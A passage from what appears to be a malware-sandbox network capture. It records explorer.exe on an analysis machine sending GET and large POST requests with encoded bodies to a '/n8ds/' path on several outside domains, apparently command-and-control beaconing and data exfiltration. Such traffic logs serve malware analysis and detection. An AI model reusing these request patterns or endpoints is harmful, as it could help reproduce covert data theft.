sSTqa2qra4JebBRjB(9Kqko71~_yYZ-sbFQc0qVd8GKfHtxH4J1h-DCg0zELafnKOTSc6tkcHW4RhRXvGJHLU61sdA4Dyz-(173Ilbdpt4bllpiG1PBNID8HL7CaMWdxBi3jkenwhhnYDuZd-XNvWoRk4dPwaNIvUw1aY8h8VPgSFTdqYMx6GIFc1cyhxezgWdLaF1OLQMIqmTkIMETjYzkLHKpIGx0EOOOT_TsvuIzEAWKQC2YMwPwp2ksXc2_Rn3Q8ffJBlW_1WkxPAS5wI5WIPODW_62afasFoiMqyH6dTi9zZI40-c_AAEAJEj1ASnUR7QRIM1LInSFnjZTunVn8mVuGDFr0bfV2_Chcr0MJIRrXUMSeor7afJEQ4ILftpLPRzdy38V(kUWcnm3T5KivfmWv_EKeKIKaYXZh9C4R-QyOtJiID(eWQqX5rw-UQbuG72O8MdBIB72Mj5mbUkxTQaHlt9vQMjm9BFFaQ~MMkwzbwqThB8o~5tY7zorWkfM0Lz8JrjS8GNpZUjxhpofXtb8gqnYmK4fW-y63vagWZhfYFm1zYelvbYgowVGxvvpMp2ssme7RWU-tYnmH85IZTrzDdeBUhF9goB2QTz0XEiFEOUMc2G1Dx0rb6LfJ_SoOwP0DjEWkt8sFFcVAFQoi2cHVySTqihp0sleGqZtEL79jX64ZcCkQafSpCpjmXFi2gDC89ZBCNL1FRWi7XKPlI6ZQyDl1ovLfl~nOOtW1UqwPe3tTYxydBt-uON4kdlxmZRlXEYSrwHeH3FaWiuUaSxLqtZidL14MJsw7nV-NYegVD3uD0vg~4fBz2Kg(08QyG8kZjWhKdip3D2zuxkL~oNI(XhLpQIXcShbUqn-GIDj0fXVYshO(ap-W-rntrXQWu8bEdz9seCdzSyG66sQwc6REHSwjed1vlOXJzm1(BPBIvNQi6v06CZdjROu6wDEKe4mQgwNEVDf4mdJ5HLLTHqG(gjjwLgrpHXwLljD1Mpw9yI3gw3pablSQRW48HG6L7gUzoeQMYX225zKtxLGyeDXaqdPAQpCwrj1vSz8EaAS~akpuMj3jwt9bzDwhLJFQJ~HO6EaUt(pEH(D2AwtXy(0y3VftrI8pxsMDZzlyx(3snfocr7KlLr3HJxyMy7FxzBQMgRuVcaWdJpGFVmaEujyvTd2OeR-jYw8h_l4AZh_3EKD91F2ovkmeqmTACxcK8A8v8RWZUzfXuP094T33vKFmkHGi88t~8Bj8Ak6m_67sqGJrLoHimzV1PkGhSmzUCrv2FNdywJZv1nk(9PZAq4U(YVyPevo8AIsMzTVy54Ci8685LXsFpMNgWxZWvr-qnA7h2GNjN7g0XwEqD2LIaqivl(xwEfnT-p-K1m-jisFgpmCjJaXYxseCANxLWkGU5xxT9tgVd40vzVdWCileDzrkAmJ6n(h24GKEUMBgNV1QRoSSBjzTShllbiixQmRLBV29vJ9sUv4TxFdPPSH44CtCJMI5VUohM5zMmzWfPaMs6IZg418THgaBOmL1msAsgz-rmm2f-3cAPvf3yOsCJ0w27Ze2g7if9tjraSIOAtd8YBYdr(kHKb5e2IxgNSgxx~5LjDD5UYq0Vq4V7mTozGPrNnxq9eAHRkXf5k8WQHMbLEe0BbjWJX4CPfoVCUto8BeYkiPBB2lFNRLP-lgOEpnpxo7GP4Ndfc335pVXrjoGRfkfXC1u4O_r_I2TPeZGkOA6oLHAJO1Vz3L(CFDX95wPQj-SsUcmy5128~HUuy6ldpQd7R-2IAgVMwGDrbNO1tmI3j8xYyrr8kSD-rSAbdJ~pz4ITQR06Z6p54abJrhBSvBItK5TGr3H9P3axINb7(QbKKi2fEvWPK5cSKeQ14qEbLVTj(UwZLITtq8zhJnCwG9vWBP07jzGfUbnn~dSuBUB9~oKizUgUNvNnQ7b0Q5SJ6GxFQM9sQNsaI4j8Pab8GwLAtbp5cRi9XYlQ3aOxq9cswXb-lh7jmV2AZTjKNguXfZsSdcAP8d7-OYtihqNqqeUaU43OBts3(JlLitPlr03CRiQvSD6XTZ~xpjS-g1WAa
                                                                                                                                                    Nov 29, 2021 14:10:50.261662006 CET6890OUTData Raw: 72 64 57 7a 4e 79 68 77 31 7a 52 65 69 4c 67 43 61 75 46 33 56 57 55 78 6d 32 6f 73 6e 6d 58 74 30 32 44 4e 75 6d 30 39 56 55 5a 65 35 6d 4d 5a 43 4f 32 59 6e 74 6b 37 71 6d 58 39 63 37 76 4c 6f 4d 61 4f 4e 70 63 42 6d 6d 44 57 62 46 6f 68 53 6e
                                                                                                                                                    Data Ascii: rdWzNyhw1zReiLgCauF3VWUxm2osnmXt02DNum09VUZe5mMZCO2Yntk7qmX9c7vLoMaONpcBmmDWbFohSn5Qo8DNPjwRRoMGMv9RjU2scWd0f0~h1d(4ofurRJOfRdWOxx7TyEYqhH~2ws08wY3oId9PELHizjhI9mVrk2Sa0o4Rx0~v~Z6mze7keCdrPG3kSsCxDQk5eN0uFKg965T6ydbQfc9wkxvQfh(_dWsuJi~q00r3U_D
                                                                                                                                                    Nov 29, 2021 14:10:50.288399935 CET6893OUTData Raw: 5a 77 6a 4c 78 76 5a 32 57 46 51 50 6b 41 58 57 6e 70 75 67 6f 55 4a 46 78 38 51 46 50 58 4c 6a 42 71 4f 35 76 75 65 6f 30 56 64 73 56 76 55 65 4e 54 6f 65 50 79 76 64 45 32 31 52 6a 4a 75 54 50 77 33 4a 4e 6d 38 46 46 67 4e 70 5a 39 72 67 79 39
                                                                                                                                                    Data Ascii: ZwjLxvZ2WFQPkAXWnpugoUJFx8QFPXLjBqO5vueo0VdsVvUeNToePyvdE21RjJuTPw3JNm8FFgNpZ9rgy97jZLlguah4TKD2b6XzaQ03msdO~0rOUfBYaJXKrJnU3rMa23piKuzA1uUQadO_SYbIBdXwKB~1EljeAeglBvEm6E7XckVQ~S15UhsA25NCda81nB70kkxbpE1Fu2SH1nshelt9YCTbWeXSrfopoOOI5FvhRaClNnd
                                                                                                                                                    Nov 29, 2021 14:10:50.288579941 CET6901OUTData Raw: 61 42 4d 4e 32 30 38 6d 4f 35 34 37 63 66 32 43 31 32 78 32 50 54 76 38 6b 77 65 5f 42 72 43 6e 54 6d 49 69 4b 45 61 6d 75 62 4a 4c 41 6f 41 46 7a 58 49 47 63 4e 72 4b 58 6c 34 64 47 74 4a 4e 51 67 34 39 54 45 63 51 63 66 6b 42 76 74 54 50 46 4a
                                                                                                                                                    Data Ascii: aBMN208mO547cf2C12x2PTv8kwe_BrCnTmIiKEamubJLAoAFzXIGcNrKXl4dGtJNQg49TEcQcfkBvtTPFJ~dyDE30ORj7DSba2FdKrRdXjvI9kWCOEHrAvrU0FhEH35ffdLO9CKZ1DSIlasLe9s1iMCtDS88h9T4m4Az7ijKPu5oxzUaOZXKqAYFU6ZherfO9fJltyt6IxvkMopsce(A(YbNsCogNYkBDKcgBnCD33JoHDVty92
                                                                                                                                                    Nov 29, 2021 14:10:50.288747072 CET6903OUTData Raw: 66 78 69 68 6f 4e 5a 55 32 6d 49 66 51 36 47 2d 6b 59 64 67 7e 37 35 51 58 42 37 4e 38 62 68 73 6e 45 61 4c 30 66 4e 2d 54 7a 6d 66 6a 2d 67 67 44 33 52 43 55 6d 44 65 36 5a 71 75 6b 76 78 70 59 36 55 71 49 5a 55 5f 6e 56 55 46 51 34 39 38 68 68
                                                                                                                                                    Data Ascii: fxihoNZU2mIfQ6G-kYdg~75QXB7N8bhsnEaL0fN-Tzmfj-ggD3RCUmDe6ZqukvxpY6UqIZU_nVUFQ498hhlyPCK67oy-Xf52hxBwbMDfDvxNzYOcrlKQpMqeLCqrK9(LeiJaAieV1keF6sdC5cG10IhmT30Zjwyoz_vZs2vt1jmt4lOgX5HuRwmaY-Dx9_rCMxoZHTlJKVYphRuVY6HMKF8KAQzu(I~1rbZkVJ8qjvG96zqjOae
                                                                                                                                                    Nov 29, 2021 14:10:50.288933039 CET6906OUTData Raw: 74 63 4e 6e 53 48 65 57 56 64 69 65 35 6a 73 65 37 4f 55 49 79 4d 72 4b 36 62 28 35 46 58 6e 6f 4d 43 52 4f 48 41 42 76 73 61 6f 77 51 69 7e 6b 42 76 45 78 4a 50 6d 4d 41 56 65 6e 5a 63 76 54 45 4d 52 6b 4c 38 41 32 36 41 79 78 74 73 7a 6a 64 55
                                                                                                                                                    Data Ascii: tcNnSHeWVdie5jse7OUIyMrK6b(5FXnoMCROHABvsaowQi~kBvExJPmMAVenZcvTEMRkL8A26AyxtszjdUptPDAnW-FKSRQvJthc1gg59TOlHpVYTieYs0EFdwCwu7t7vIa2tNPCHQAQL-SB6PMngpnbY_M2lNzkrf8_(TxahjORK3TFHtb1qWmPbJdmq9wIZjcn3AJp~w4QfeaXGEL7tkpR5Ozjy_JtyWVc7PUgP1msgkCNpRT
                                                                                                                                                    Nov 29, 2021 14:10:50.289103031 CET6912OUTData Raw: 4f 44 58 63 35 42 6e 51 59 64 4f 64 34 57 6b 79 76 4e 71 4f 32 63 75 41 56 75 30 42 51 42 31 77 6e 77 50 33 63 44 4d 4a 56 39 70 5f 42 37 79 4c 33 30 4c 72 6b 39 4f 31 31 66 66 46 74 5f 35 78 49 4e 7a 44 66 39 77 51 78 44 33 4a 67 63 39 36 33 31
                                                                                                                                                    Data Ascii: ODXc5BnQYdOd4WkyvNqO2cuAVu0BQB1wnwP3cDMJV9p_B7yL30Lrk9O11ffFt_5xINzDf9wQxD3Jgc9631YiIAcDODwAdlfj~tcUeD4WRMsvnX~Q8bU58GNrB_dEYALwENbxlcgQQecr77rb8PkxzTBj8-0krHr6EU8THN1lJryj41P-wlKnppNSjGwVKeslmlQwGmSp2_gitIjzMAvxgWcCC_ZucnEJSzwzaCLTdcA6yC6h~IG
                                                                                                                                                    Nov 29, 2021 14:10:50.289299965 CET6917OUTData Raw: 75 54 67 52 34 74 78 5a 6b 66 62 4c 6e 4c 71 32 4c 49 65 74 4f 37 76 6a 6c 5a 48 55 33 2d 6c 74 49 4e 52 7a 49 50 46 6a 39 49 6c 42 71 4e 72 6a 56 54 78 71 70 37 44 7a 39 6f 49 74 7e 50 76 4a 7e 31 69 51 7e 39 42 73 52 38 54 4c 75 30 43 74 62 55
                                                                                                                                                    Data Ascii: uTgR4txZkfbLnLq2LIetO7vjlZHU3-ltINRzIPFj9IlBqNrjVTxqp7Dz9oIt~PvJ~1iQ~9BsR8TLu0CtbUevqX2ndvowszmk5WfYfb3qKAQjXZD1dib7HmEqRrAamDuM8gVAteY1z5x9NnEZd8VbJAoG0OzBQjIiuTvtOd9ir5sGBBVPKmAMJ1fNP10itqHnuZw5kvvYkKKZI6rqHJKPU7N7A-Cz0IRUIXgzuTr7dcTKvvZfFSN
                                                                                                                                                    Nov 29, 2021 14:10:50.315397978 CET6920OUTData Raw: 76 51 6d 70 66 51 61 4d 45 7a 38 50 75 6e 35 67 36 53 35 59 52 66 72 68 4e 38 36 4a 4e 43 7a 50 56 7a 35 4f 70 6d 45 69 78 33 79 37 4c 54 75 66 45 46 42 4f 66 4c 35 38 57 75 4a 4d 6d 2d 42 72 42 53 49 6d 78 78 57 77 67 53 73 7a 4c 33 63 38 47 65
                                                                                                                                                    Data Ascii: vQmpfQaMEz8Pun5g6S5YRfrhN86JNCzPVz5OpmEix3y7LTufEFBOfL58WuJMm-BrBSImxxWwgSszL3c8GemISTKeUbDqvjnm9zB0P69cNoKjWbr-8_wvJUSIQxe_S57H3nGQXz7QC9YR8C2cHq7ZDGKE0JJfseuYIrszYz6B~yX9smlKEQrN3_qiA5GSpekQLv2GFJdgr9PnHH7_PYPbPiO9rIsJnnwXoIaR~i8EgdZTcSM-sYz
                                                                                                                                                    Nov 29, 2021 14:10:50.315572977 CET6921OUTData Raw: 41 2d 45 64 37 68 33 6f 6a 68 57 4d 37 76 69 71 4f 35 59 46 46 74 66 44 47 59 43 79 78 78 6c 66 63 4a 79 77 45 33 76 55 35 71 53 68 6a 62 37 5a 4d 57 46 54 4f 39 66 4b 57 6d 53 4b 72 30 38 71 72 6e 75 46 5a 50 41 65 35 75 49 48 39 79 4f 61 7a 6b
                                                                                                                                                    Data Ascii: A-Ed7h3ojhWM7viqO5YFFtfDGYCyxxlfcJywE3vU5qShjb7ZMWFTO9fKWmSKr08qrnuFZPAe5uIH9yOazkGXixen6hpFhA0al2IlEo~eHKVYVUtlXpDjQ00BRJz0oweAanRQ8aTz(77pfwvQyhPLC5M1hwzHrbkEHLqDgkFeOV~opLSyir8l80ox2QL_0feTPwDpTKxAkTba891QgODeYcansQ9VJamDhiIuCGC0JtJikRSaRXB
                                                                                                                                                    Nov 29, 2021 14:10:50.315701008 CET6923OUTData Raw: 56 61 37 31 48 48 4b 39 69 61 51 7a 38 45 66 35 5a 64 4f 61 56 57 7a 77 65 47 6f 38 66 43 4c 51 31 58 6d 71 32 35 5a 38 70 48 28 47 61 6e 36 52 6e 6d 44 77 4c 4e 73 4a 45 49 35 30 4e 6c 66 59 62 2d 4a 6b 56 38 48 38 33 37 4c 49 4c 72 52 41 65 65
                                                                                                                                                    Data Ascii: Va71HHK9iaQz8Ef5ZdOaVWzweGo8fCLQ1Xmq25Z8pH(Gan6RnmDwLNsJEI50NlfYb-JkV8H837LILrRAee1WQFRHymi7mULgRZXrM3bF2HDSVrQNnEkSYbneNq5aVenStgL4NjgbVgo7IPjbivRJM3d8nLfbTV9kwhbvRm2pr843yfPVa9vtZwBvsuOtOBApOwxMEIicdathev6Fl0Exvo6tXHQmHBh0B1YjnZIylWpKtSSbmby
                                                                                                                                                    Nov 29, 2021 14:10:51.376867056 CET7010INHTTP/1.1 403 Forbidden
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:10:51 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 207
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 6e 38 64 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /n8ds/on this server.</p></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    27192.168.11.204983981.2.194.12880C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:10:50.289401054 CET6917OUTGET /n8ds/?lZOD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&y6AH=yHQDs HTTP/1.1
                                                                                                                                                    Host: www.growebox.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:10:51.388405085 CET7012INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:10:51 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 3011
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 54 68 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 69 73 20 72 65 67 69 73 74 65 72 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 30 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 4f 52 50 53 49 20 6a 65 20 45 76 72 6f 70 73 6b e1 20 68 6f 75 73 69 6e 67 6f 76 e1 20 73 70 6f 6c 65 e8 6e 6f 73 74 2e 20 4e 61 62 ed 7a ed 20 73 6c 75 9e 62 79 20 77 65 62 68 6f 73 74 69 6e 67 75 2c 20 73 65 72 76 65 72 68 6f 73 74 69 6e 67 75 2c 20 72 65 67 69 73 74 72 61 63 65 20 64 6f 6d e9 6e 6f 76 fd 63 68 20 6a 6d 65 6e 20 61 20 77 77 77 20 73 74 72 e1 6e 6b 79 20 6e 61 20 73 65 72 76 65 72 65 63 68 20 57 69 6e 64 6f 77 73 2f 4c 69 6e 75 78 2e 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 72 70 73 69 2c 77 65 62 68 6f 73 74 69 6e 67 2c 64 6f 6d e9 6e 61 2c 64 6f 6d e9 6e 79 2c 68 6f 73 74 69 6e 67 2c 73 65 72 76 65 72 2c 73 65 72 76 65 72 68 6f 73 74 69 6e 67 2c 68 6f 75 73 69 6e 67 2c 73 65 72 76 65 72 68 6f 75 73 69 6e 67 2c 61 64 73 6c 2c 77 69 66 69 2c 77 69 2d 66 69 2c 64 6f 6d 61 69 6e 2c 64 6f 6d 61 69 6e 73 22 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 32 35 34 39 63 3b 0d 0a 7d 0d 0a 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 7d 0d 0a 23 62 6f 78 20 7b 0d 0a 09 77 69 64 74 68 3a 20 35 32 30 70 78 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 09 74 6f 70 3a 20 31 36 30 70 78 3b 0d 0a 09 62 6f 72 64 65 72 3a 20 34 70 78 20 73 6f 6c 69 64 20 23 63 63 63 63 63 63 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 69 6d 67 2f 6c 6f 67 6f 5f 66 6f 72 70 73 69 2e 67 69 66 29 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 6c 65 66 74 20 74 6f 70 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 33 38 35 30 36 62 3b 0d 0a 7d 0d 0a 23 62 6f 78 32 20 7b 0d 0a 09 77 69 64 74 68 3a 20 35 32 30 70 78 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><title>The domain name is registered</title><meta name="robots" content="noindex, nofollow"><meta http-equiv="Content-Type" content="text/html; charset=windows-1250"><meta name="description" content="FORPSI je Evropsk housingov spolenost. Nabz sluby webhostingu, serverhostingu, registrace domnovch jmen a www strnky na serverech Windows/Linux."><meta name="keywords" content="forpsi,webhosting,domna,domny,hosting,server,serverhosting,housing,serverhousing,adsl,wifi,wi-fi,domain,domains"><style type="text/css">...html, body {margin: 0px;padding: 0px;height: 100%;background-color: #32549c;}#container {height: 100%;width: 100%;text-align: center;}#box {width: 520px;position: relative;margin: 0 auto;top: 160px;border: 4px solid #cccccc;background-color: #FFFFFF;background-image: url(img/logo_forpsi.gif);background-repeat: no-repeat;background-position: left top;padding: 20px;font-family : Verdana, Arial, Helvetica, sans-serif;font-size: 14px;color: #38506b;}#box2 {width: 520px;position: relative;margin:
                                                                                                                                                    Nov 29, 2021 14:10:51.388493061 CET7013INData Raw: 30 20 61 75 74 6f 3b 0d 0a 09 74 6f 70 3a 20 31 36 30 70 78 3b 0d 0a 09 62 6f 72 64 65 72 3a 20 34 70 78 20 73 6f 6c 69 64 20 23 63 63 63 63 63 63 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0d 0a 09
                                                                                                                                                    Data Ascii: 0 auto;top: 160px;border: 4px solid #cccccc;background-color: #FFFFFF;padding: 20px;font-family : Verdana, Arial, Helvetica, sans-serif;font-size: 14px;color: #38506b;}#flag {position: absolute;left: 95px;top
                                                                                                                                                    Nov 29, 2021 14:10:51.388549089 CET7014INData Raw: 61 63 75 74 65 3b 4e 41 20 4a 45 20 5a 41 52 45 47 49 53 54 52 4f 56 26 41 61 63 75 74 65 3b 4e 41 3c 2f 74 64 3e 0d 0a 20 20 3c 2f 74 72 3e 0d 0a 20 20 3c 74 72 3e 0d 0a 20 20 20 20 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 66 6c 61
                                                                                                                                                    Data Ascii: acute;NA JE ZAREGISTROV&Aacute;NA</td> </tr> <tr> <td><img src="img/flagSk.png" /></td> <td class="txt">DOM&Eacute;NA JE ZAREGISTROVAN&Aacute;</td> </tr> <tr> <td><img src="img/flagPol.gif" /></td> <td class="tx


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    28192.168.11.2049840172.67.201.23280C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:11:00.925525904 CET7020OUTPOST /n8ds/ HTTP/1.1
                                                                                                                                                    Host: www.topwowshopping.store
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 131142
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.topwowshopping.store
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://www.topwowshopping.store/n8ds/
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Data Raw: 6c 5a 4f 44 3d 5a 4d 78 63 48 42 41 39 76 6f 51 2d 5a 41 51 48 53 5a 68 4d 59 4a 78 6d 68 42 4a 73 38 47 61 53 69 66 6d 76 6f 2d 70 67 46 55 76 65 42 42 6f 64 28 6b 69 48 55 45 6c 33 46 43 68 66 4e 6e 57 49 66 75 61 65 35 59 69 75 6c 4b 7a 61 43 46 28 38 55 79 73 48 62 70 7e 33 44 67 30 6e 6b 33 39 44 35 4e 70 32 7a 75 61 68 61 78 34 63 30 71 71 71 73 5a 42 59 35 4b 4d 36 56 61 5a 65 57 45 30 4c 68 78 53 55 37 37 34 6a 54 61 66 78 56 68 46 39 51 52 54 43 54 77 73 4e 6e 6f 7a 74 56 42 6c 67 39 49 4e 46 33 78 6e 6d 44 57 6f 31 38 4d 47 79 50 71 72 37 4f 45 34 74 4c 6c 66 2d 6f 39 41 45 41 47 36 59 44 78 6f 57 73 72 64 57 72 59 32 30 77 56 75 73 48 4a 36 36 4c 6f 6b 43 69 63 54 67 34 4f 68 5a 28 46 39 59 64 30 36 47 57 76 47 66 71 63 66 6c 66 4e 6e 42 62 4a 63 46 4b 4e 36 42 73 77 31 78 48 45 65 56 4f 4a 5a 52 36 6b 72 6d 4d 49 59 73 77 6a 50 5a 36 76 63 47 51 68 31 59 49 6b 78 77 79 4f 6f 51 38 36 48 52 66 75 4a 48 67 79 33 61 75 2d 54 73 4b 67 65 6c 34 46 79 77 52 33 62 53 32 4f 6f 75 53 35 6b 65 41 48 32 69 6f 4b 4b 57 71 46 56 58 7a 79 57 48 4c 35 70 48 63 35 6d 55 63 7a 7a 61 75 35 67 79 67 4a 70 67 47 32 58 58 54 47 36 70 39 53 77 6f 74 65 4f 53 54 30 69 47 6b 4b 77 77 4c 61 76 55 4c 6e 46 36 46 54 77 5a 42 34 59 61 58 44 68 30 37 33 72 32 4a 45 55 75 28 4f 75 5a 4f 6d 6b 6b 28 4a 6c 62 37 31 30 46 66 7a 77 4d 4f 63 43 74 70 58 34 2d 46 34 4e 2d 46 43 74 6c 71 57 33 7a 58 61 57 41 65 69 46 67 52 66 75 48 50 64 5a 63 35 4b 36 52 47 78 36 64 49 41 6e 5a 50 6c 55 54 32 79 6e 6a 39 49 33 36 44 59 33 57 66 56 5a 69 63 52 48 4f 70 74 33 56 6f 4d 39 58 46 76 41 58 44 73 4f 5f 64 62 4a 52 37 79 72 76 44 57 64 4a 56 55 41 4c 30 63 56 67 6a 30 78 58 64 31 78 4c 5a 44 6f 42 36 62 67 4c 50 6c 50 52 78 4d 31 72 62 39 6f 4f 64 76 39 30 66 39 68 31 52 61 70 43 6d 36 68 54 6e 48 28 6d 6c 44 77 56 6f 65 56 34 56 75 28 44 48 52 79 76 30 79 67 36 54 30 53 42 5a 56 6a 33 41 46 35 2d 74 55 48 59 63 48 46 65 7e 63 41 57 33 47 77 52 59 4e 70 75 67 58 37 64 51 49 54 41 4b 64 58 46 57 4c 35 51 7e 4e 70 41 33 45 43 70 30 68 31 61 32 31 42 65 56 63 69 31 66 48 6b 6f 62 50 61 55 48 31 6f 2d 4d 66 32 52 61 62 65 73 49 4b 56 73 58 72 46 5a 7e 33 43 56 53 64 28 46 5a 6b 44 6f 43 56 33 38 44 6a 36 57 69 48 67 61 75 4d 58 31 6c 39 37 35 76 49 43 47 72 6e 63 71 71 31 70 57 4b 78 48 34 38 46 47 43 34 36 47 59 42 66 4d 4a 62 4c 43 6a 74 71 75 35 6d 6a 48 6a 58 47 6f 68 45 47 46 33 36 38 6b 33 66 33 49 74 34 78 67 34 7a 32 5a 4a 6e 4b 46 33 64 43 48 4b 68 39 72 7a 69 31 68 59 52 77 57 30 58 4f 63 68 7a 4e 43 50 64 71 6f 6f 54 33 6a 49 44 56 61 68 31 55 59 69 32 68 7a 55 71 2d 58 67 55 5f 34 69 54 42 46 48 46 55 79 75 56 78 32 6e 36 51 35 5a 59 61 59 48 6f 2d 72 67 64 59 30 6b 48 58 69 42 46 4b 38 41 5a 36 67 7a 41 71 62 63 42 56 33 67 6c 6b 75 62 32 54 72 67 4b 54 51 62 30 57 56 31 65 41 6b 4e 63 63 34 31 6e 4a 65 78 31 34 51 7a 38 2d 31 58 67 58 61 62 6f 39 6c 36 79 5a 76 76 54 79 4b 55 32 6f 74 64 4d 6e 43 5f 48 52 31 44 63 45 76 74 39 4b 33 2d 78 38 70 32 51 53 35 68 76 76 77 6a 33 46 51 74 56 46 36 78 78 43 4a 5f 75 5a 28 31 54 2d 75 44 75 7a 63 79 30 64 37 5f 57 64 42 56 6f 63 33 69 75 57 28 55 7a 54 44 65 64 76 35 30 41 2d 5a 41 5a 4c 33 4d 4b 2d 38 6f 30 58 37 67 4f 52 52 45 64 4a 52 55 76 79 4c 72 58 71 61 65 73 67 70 6b 45 53 70 51 32 6a 35 